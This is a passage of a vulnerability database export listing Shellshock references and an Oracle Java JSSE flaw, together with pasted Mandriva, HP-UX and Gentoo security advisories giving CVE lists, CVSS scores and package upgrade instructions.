"trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-1855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2305" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9425" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3618" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9709" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0273" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-2532" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2014-9652" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-0286" }, { "trust": 0.1, "url": "https://www.tencent.com)" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6277" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-7186" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-7187" }, { "trust": 0.1, "url": "http://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2014-6278" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://security.gentoo.org/glsa/glsa-201410-01.xml" }, { "trust": 0.1, "url": "http://support.openview.hp.com/selfsolve/document/km01194259" }, { "trust": 0.1, "url": "http://h20272.www2.hp.com/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "BID", "id": "70152" }, { "db": "PACKETSTORM", "id": "128716" }, { "db": "PACKETSTORM", "id": "128458" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128567" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "129067" }, { "db": "PACKETSTORM", "id": "128537" }, { "db": "PACKETSTORM", "id": "129070" }, { "db": "PACKETSTORM", "id": "133803" }, { "db": "PACKETSTORM", "id": "129438" }, { "db": "PACKETSTORM", "id": "128563" }, { "db": "PACKETSTORM", "id": "128762" }, { "db": "PACKETSTORM", "id": "129073" }, { "db": "PACKETSTORM", "id": "128760" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "db": "NVD", "id": "CVE-2014-7186" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "VULMON", "id": "CVE-2014-7186" }, { "db": "BID", "id": "70152" }, { "db": "PACKETSTORM", "id": "128716" }, { "db": "PACKETSTORM", "id": "128458" }, { "db": "PACKETSTORM", "id": "130988" }, { "db": "PACKETSTORM", "id": "128567" }, { "db": "PACKETSTORM", "id": "129069" }, { "db": "PACKETSTORM", "id": "129067" }, { "db": "PACKETSTORM", "id": "128537" }, { "db": "PACKETSTORM", "id": "129070" }, { "db": "PACKETSTORM", "id": "133803" }, { "db": "PACKETSTORM", "id": "129438" }, { "db": "PACKETSTORM", "id": "128563" }, { "db": "PACKETSTORM", "id": "128762" }, { "db": "PACKETSTORM", "id": "129073" }, { "db": "PACKETSTORM", "id": "128760" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "db": "NVD", "id": "CVE-2014-7186" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2014-09-25T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2014-09-28T00:00:00", "db": "VULMON", "id": "CVE-2014-7186" }, { "date": "2014-09-25T00:00:00", "db": "BID", "id": "70152" }, { "date": "2014-10-16T13:33:00", "db": "PACKETSTORM", "id": "128716" }, { "date": "2014-09-27T16:46:04", "db": "PACKETSTORM", "id": "128458" }, { "date": "2015-03-24T17:07:02", "db": "PACKETSTORM", "id": "130988" }, { "date": "2014-10-06T16:47:01", "db": "PACKETSTORM", "id": "128567" }, { "date": "2014-11-12T18:13:47", "db": "PACKETSTORM", "id": "129069" }, { "date": "2014-11-12T18:13:32", "db": "PACKETSTORM", "id": "129067" }, { "date": "2014-10-03T00:57:40", "db": "PACKETSTORM", "id": "128537" }, { "date": "2014-11-12T18:13:53", "db": "PACKETSTORM", "id": "129070" }, { "date": "2015-10-01T16:33:47", "db": "PACKETSTORM", "id": "133803" }, { "date": "2014-12-09T23:15:30", "db": "PACKETSTORM", "id": "129438" }, { "date": "2014-10-06T16:37:31", "db": "PACKETSTORM", "id": "128563" }, { "date": "2014-10-20T17:44:00", "db": "PACKETSTORM", "id": "128762" }, { "date": "2014-11-12T18:14:19", "db": "PACKETSTORM", "id": "129073" }, { "date": "2014-10-20T17:03:00", "db": "PACKETSTORM", "id": "128760" }, { "date": "2014-09-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "date": "2014-09-28T19:55:06.223000", "db": "NVD", "id": "CVE-2014-7186" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2015-04-14T00:00:00", "db": "CERT/CC", "id": "VU#252743" }, { "date": "2018-10-09T00:00:00", "db": "VULMON", "id": "CVE-2014-7186" }, { "date": "2015-11-03T19:52:00", "db": "BID", "id": "70152" }, { "date": "2014-09-29T00:00:00", "db": "CNNVD", "id": "CNNVD-201409-1072" }, { "date": "2018-10-09T19:52:19.070000", "db": "NVD", "id": "CVE-2014-7186" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "128537" }, { "db": "PACKETSTORM", "id": "128563" }, { "db": "CNNVD", "id": "CNNVD-201409-1072" } ], "trust": 0.8 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "GNU Bash shell executes commands in exported functions in environment variables", "sources": [ { "db": "CERT/CC", "id": "VU#252743" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "buffer overflow", "sources": [ { "db": "CNNVD", "id": "CNNVD-201409-1072" } ], "trust": 0.6 } }
var-201210-0280
Vulnerability from variot
Unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 7 and earlier, 6 Update 35 and earlier, 5.0 Update 36 and earlier, and 1.4.2_38 and earlier allows remote attackers to affect availability, related to JSSE. TLS implementations may disclose side channel information via discrepancies between valid and invalid PKCS#1 padding, and may therefore be vulnerable to Bleichenbacher-style attacks. This attack is known as a "ROBOT attack". The vulnerability can be exploited over the 'SSL/TLS' protocol. This issue affects the 'JSSE' sub-component. This vulnerability affects the following supported versions: 7 Update 7, 6 Update 35, 5.0 Update 36, 1.4.2_38. In a typical operating environment, these are of low security risk as the runtime is not used on untrusted applets. Further information about these flaws can be found on the Oracle Java SE Critical Patch Update Advisory and Oracle Security Alert pages, listed in the References section. OpenVMS Integrity JDK and JRE 6.0-3.p1 and earlier. Customers are advised to migrate to later versions of Java at this time. In cases where it is not feasible to move to a later version of supported Java, customers are advised to contact IBM to evaluate other options. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Mandriva Linux Security Advisory MDVSA-2012:169 http://www.mandriva.com/security/
Package : java-1.6.0-openjdk Date : November 1, 2012 Affected: 2011., Enterprise Server 5.0
Problem Description:
Multiple security issues were identified and fixed in OpenJDK (icedtea6):
- S6631398, CVE-2012-3216: FilePermission improved path checking
- S7093490: adjust package access in rmiregistry
- S7143535, CVE-2012-5068: ScriptEngine corrected permissions
- S7167656, CVE-2012-5077: Multiple Seeders are being created
- S7169884, CVE-2012-5073: LogManager checks do not work correctly for sub-types
- S7169888, CVE-2012-5075: Narrowing resource definitions in JMX RMI connector
- S7172522, CVE-2012-5072: Improve DomainCombiner checking
- S7186286, CVE-2012-5081: TLS implementation to better adhere to RFC
- S7189103, CVE-2012-5069: Executors needs to maintain state
- S7189490: More improvements to DomainCombiner checking
- S7189567, CVE-2012-5085: java net obselete protocol
- S7192975, CVE-2012-5071: Conditional usage check is wrong
- S7195194, CVE-2012-5084: Better data validation for Swing
- S7195917, CVE-2012-5086: XMLDecoder parsing at close-time should be improved
- S7195919, CVE-2012-5979: (sl) ServiceLoader can throw CCE without needing to create instance
- S7198296, CVE-2012-5089: Refactor classloader usage
- S7158800: Improve storage of symbol tables
- S7158801: Improve VM CompileOnly option
- S7158804: Improve config file parsing
- S7176337: Additional changes needed for 7158801 fix
- S7198606, CVE-2012-4416: Improve VM optimization
The updated packages provides icedtea6-1.11.5 which is not vulnerable to these issues. The verification of md5 checksums and GPG signatures is performed automatically for you. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/security/advisories
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFQklqImqjQ0CJFipgRAiNOAJ4qA9L2NTdql1htD7pQDNJrDlPnUgCguupW xu3AOptE+B1OsUdPAeTUH5o= =2CFK -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03595351
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c03595351 Version: 1
HPSBUX02832 SSRT101042 rev.1 - HP-UX Running Java, Remote Unauthorized Access, Disclosure of Information, and Other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2012-12-12 Last Updated: 2012-12-12
Potential Security Impact: Remote unauthorized access, disclosure of information, and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified in Java Runtime Environment (JRE) and Java Developer Kit (JDK) running on HP-UX. These vulnerabilities could allow remote unauthorized access, disclosure of information, and other exploits. HP-UX B.11.11, B.11.23, and B.11.31 running HP JDK and JRE v7.0.03, v6.0.16 and v5.0.26 and earlier
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2012-1531 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1532 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-1533 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3143 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-3159 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-3216 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2012-4416 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-5068 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-5069 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2012-5071 (AV:N/AC:L/Au:N/C:P/I:P/A:N) 6.4 CVE-2012-5072 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2012-5073 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2012-5075 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0 CVE-2012-5077 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 CVE-2012-5079 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2012-5081 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-5083 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-5084 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 CVE-2012-5085 (AV:N/AC:M/Au:S/C:N/I:N/A:N) 0.0 CVE-2012-5086 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-5087 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0 CVE-2012-5089 (AV:N/AC:H/Au:N/C:C/I:C/A:C) 7.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
NOTE: The following apply to both v7.0.03 and v6.0.16 and earlier: CVE-2012-1531, CVE-2012-1532, CVE-2012-1533, CVE-2012-3143, CVE-2012-3159, CVE-2012-3216, CVE-2012-4416, CVE-2012-5068, CVE-2012-5069, CVE-2012-5071, CVE-2012-5072, CVE-2012-5073, CVE-2012-5075, CVE-2012-5077, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5085, CVE-2012-5086, CVE-2012-5087, CVE-2012-5089
NOTE: The following apply to v5.0.26 and earlier: CVE-2012-1531, CVE-2012-3143, CVE-2012-3216, CVE-2012-5069, CVE-2012-5071, CVE-2012-5073, CVE-2012-5075, CVE-2012-5077, CVE-2012-5079, CVE-2012-5081, CVE-2012-5083, CVE-2012-5084, CVE-2012-5085, CVE-2012-5089
RESOLUTION
HP has provided the following Java version upgrade to resolve these vulnerabilities. The upgrade is available from the following location
http://www.hp.com/java
HP-UX B.11.23, B.11.31 JDK and JRE v7.0.04 or subsequent
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v6.0.17 or subsequent
HP-UX B.11.11, B.11.23, B.11.31 JDK and JRE v5.0.27 or subsequent
MANUAL ACTIONS: Yes - Update For Java v7.0 update to Java v7.0.04 or subsequent For Java v6.0 update to Java v6.0.17 or subsequent For Java v5.0 update to Java v5.0.27 or subsequent
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see https://www.hp.com/go/swa
The following text is for use by the HP-UX Software Assistant.
AFFECTED VERSIONS
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk70.JDK70-COM Jdk70.JDK70-DEMO Jdk70.JDK70-IPF32 Jdk70.JDK70-IPF64 Jre70.JRE70-COM Jre70.JRE70-IPF32 Jre70.JRE70-IPF32-HS Jre70.JRE70-IPF64 Jre70.JRE70-IPF64-HS action: install revision 1.7.0.04.00 or subsequent
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk60.JDK60-COM Jdk60.JDK60-DEMO Jdk60.JDK60-IPF32 Jdk60.JDK60-IPF64 Jre60.JRE60-COM Jre60.JRE60-IPF32 Jre60.JRE60-IPF32-HS Jre60.JRE60-IPF64 Jre60.JRE60-IPF64-HS action: install revision 1.6.0.17.00 or subsequent
HP-UX B.11.23 HP-UX B.11.31 =========== Jdk15.JDK15-COM Jdk15.JDK15-DEMO Jdk15.JDK15-IPF32 Jdk15.JDK15-IPF64 Jre15.JRE15-COM Jre15.JRE15-COM-DOC Jre15.JRE15-IPF32 Jre15.JRE15-IPF32-HS Jre15.JRE15-IPF64 Jre15.JRE15-IPF64-HS action: install revision 1.5.0.27.00 or subsequent
HP-UX B.11.11 HP-UX B.11.23 =========== Jdk60.JDK60-COM Jdk60.JDK60-DEMO Jdk60.JDK60-PA20 Jdk60.JDK60-PA20W Jre60.JRE60-COM Jre60.JRE60-COM-DOC Jre60.JRE60-PA20 Jre60.JRE60-PA20-HS Jre60.JRE60-PA20W Jre60.JRE60-PA20W-HS action: install revision 1.6.0.17.00 or subsequent
HP-UX B.11.11 HP-UX B.11.23 =========== Jdk15.JDK15-COM Jdk15.JDK15-DEMO Jdk15.JDK15-PA20 Jdk15.JDK15-PA20W Jre15.JRE15-COM Jre15.JRE15-COM-DOC Jre15.JRE15-PA20 Jre15.JRE15-PA20-HS Jre15.JRE15-PA20W Jre15.JRE15-PA20W-HS action: install revision 1.5.0.27.00 or subsequent
END AFFECTED VERSIONS
HISTORY Version:1 (rev.1) - 12 December 2012 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c02964430
Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201401-30
http://security.gentoo.org/
Severity: High Title: Oracle JRE/JDK: Multiple vulnerabilities Date: January 27, 2014 Bugs: #404071, #421073, #433094, #438706, #451206, #455174, #458444, #460360, #466212, #473830, #473980, #488210, #498148 ID: 201401-30
Synopsis
Multiple vulnerabilities have been found in the Oracle JRE/JDK, allowing attackers to cause unspecified impact.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-java/sun-jdk <= 1.6.0.45 Vulnerable! 2 dev-java/oracle-jdk-bin < 1.7.0.51 >= 1.7.0.51 * 3 dev-java/sun-jre-bin <= 1.6.0.45 Vulnerable! 4 dev-java/oracle-jre-bin < 1.7.0.51 >= 1.7.0.51 * 5 app-emulation/emul-linux-x86-java < 1.7.0.51 >= 1.7.0.51 * ------------------------------------------------------------------- NOTE: Certain packages are still vulnerable. Users should migrate to another package if one is available or wait for the existing packages to be marked stable by their architecture maintainers. ------------------------------------------------------------------- NOTE: Packages marked with asterisks require manual intervention! ------------------------------------------------------------------- 5 affected packages
Description
Multiple vulnerabilities have been reported in the Oracle Java implementation. Please review the CVE identifiers referenced below for details.
Workaround
There is no known workaround at this time.
Resolution
All Oracle JDK 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jdk-bin-1.7.0.51"
All Oracle JRE 1.7 users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot -v ">=dev-java/oracle-jre-bin-1.7.0.51"
All users of the precompiled 32-bit Oracle JRE should upgrade to the latest version:
# emerge --sync # emerge -a -1 -v ">=app-emulation/emul-linux-x86-java-1.7.0.51"
All Sun Microsystems JDK/JRE 1.6 users are suggested to upgrade to one of the newer Oracle packages like dev-java/oracle-jdk-bin or dev-java/oracle-jre-bin or choose another alternative we provide; eg. the IBM JDK/JRE or the open source IcedTea.
References
[ 1 ] CVE-2011-3563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3563 [ 2 ] CVE-2011-5035 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-5035 [ 3 ] CVE-2012-0497 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0497 [ 4 ] CVE-2012-0498 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0498 [ 5 ] CVE-2012-0499 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0499 [ 6 ] CVE-2012-0500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0500 [ 7 ] CVE-2012-0501 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0501 [ 8 ] CVE-2012-0502 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0502 [ 9 ] CVE-2012-0503 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0503 [ 10 ] CVE-2012-0504 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0504 [ 11 ] CVE-2012-0505 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0505 [ 12 ] CVE-2012-0506 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0506 [ 13 ] CVE-2012-0507 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0507 [ 14 ] CVE-2012-0547 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0547 [ 15 ] CVE-2012-1531 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1531 [ 16 ] CVE-2012-1532 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1532 [ 17 ] CVE-2012-1533 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1533 [ 18 ] CVE-2012-1541 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1541 [ 19 ] CVE-2012-1682 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1682 [ 20 ] CVE-2012-1711 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1711 [ 21 ] CVE-2012-1713 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1713 [ 22 ] CVE-2012-1716 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1716 [ 23 ] CVE-2012-1717 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1717 [ 24 ] CVE-2012-1718 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1718 [ 25 ] CVE-2012-1719 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1719 [ 26 ] CVE-2012-1721 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1721 [ 27 ] CVE-2012-1722 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1722 [ 28 ] CVE-2012-1723 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1723 [ 29 ] CVE-2012-1724 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1724 [ 30 ] CVE-2012-1725 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1725 [ 31 ] CVE-2012-1726 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1726 [ 32 ] CVE-2012-3136 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3136 [ 33 ] CVE-2012-3143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3143 [ 34 ] CVE-2012-3159 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3159 [ 35 ] CVE-2012-3174 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3174 [ 36 ] CVE-2012-3213 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3213 [ 37 ] CVE-2012-3216 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3216 [ 38 ] CVE-2012-3342 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3342 [ 39 ] CVE-2012-4416 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4416 [ 40 ] CVE-2012-4681 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4681 [ 41 ] CVE-2012-5067 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5067 [ 42 ] CVE-2012-5068 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5068 [ 43 ] CVE-2012-5069 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5069 [ 44 ] CVE-2012-5070 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5070 [ 45 ] CVE-2012-5071 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5071 [ 46 ] CVE-2012-5072 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5072 [ 47 ] CVE-2012-5073 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5073 [ 48 ] CVE-2012-5074 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5074 [ 49 ] CVE-2012-5075 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5075 [ 50 ] CVE-2012-5076 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5076 [ 51 ] CVE-2012-5077 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5077 [ 52 ] CVE-2012-5079 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5079 [ 53 ] CVE-2012-5081 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5081 [ 54 ] CVE-2012-5083 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5083 [ 55 ] CVE-2012-5084 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5084 [ 56 ] CVE-2012-5085 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5085 [ 57 ] CVE-2012-5086 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5086 [ 58 ] CVE-2012-5087 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5087 [ 59 ] CVE-2012-5088 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5088 [ 60 ] CVE-2012-5089 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-5089 [ 61 ] CVE-2013-0169 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0169 [ 62 ] CVE-2013-0351 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0351 [ 63 ] CVE-2013-0401 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0401 [ 64 ] CVE-2013-0402 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0402 [ 65 ] CVE-2013-0409 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0409 [ 66 ] CVE-2013-0419 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0419 [ 67 ] CVE-2013-0422 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0422 [ 68 ] CVE-2013-0423 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0423 [ 69 ] CVE-2013-0430 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0430 [ 70 ] CVE-2013-0437 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0437 [ 71 ] CVE-2013-0438 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0438 [ 72 ] CVE-2013-0445 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0445 [ 73 ] CVE-2013-0446 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0446 [ 74 ] CVE-2013-0448 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0448 [ 75 ] CVE-2013-0449 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0449 [ 76 ] CVE-2013-0809 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-0809 [ 77 ] CVE-2013-1473 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1473 [ 78 ] CVE-2013-1479 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1479 [ 79 ] CVE-2013-1481 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1481 [ 80 ] CVE-2013-1484 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1484 [ 81 ] CVE-2013-1485 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1485 [ 82 ] CVE-2013-1486 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1486 [ 83 ] CVE-2013-1487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1487 [ 84 ] CVE-2013-1488 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1488 [ 85 ] CVE-2013-1491 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1491 [ 86 ] CVE-2013-1493 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1493 [ 87 ] CVE-2013-1500 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1500 [ 88 ] CVE-2013-1518 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1518 [ 89 ] CVE-2013-1537 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1537 [ 90 ] CVE-2013-1540 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1540 [ 91 ] CVE-2013-1557 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1557 [ 92 ] CVE-2013-1558 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1558 [ 93 ] CVE-2013-1561 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1561 [ 94 ] CVE-2013-1563 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1563 [ 95 ] CVE-2013-1564 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1564 [ 96 ] CVE-2013-1569 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-1569 [ 97 ] 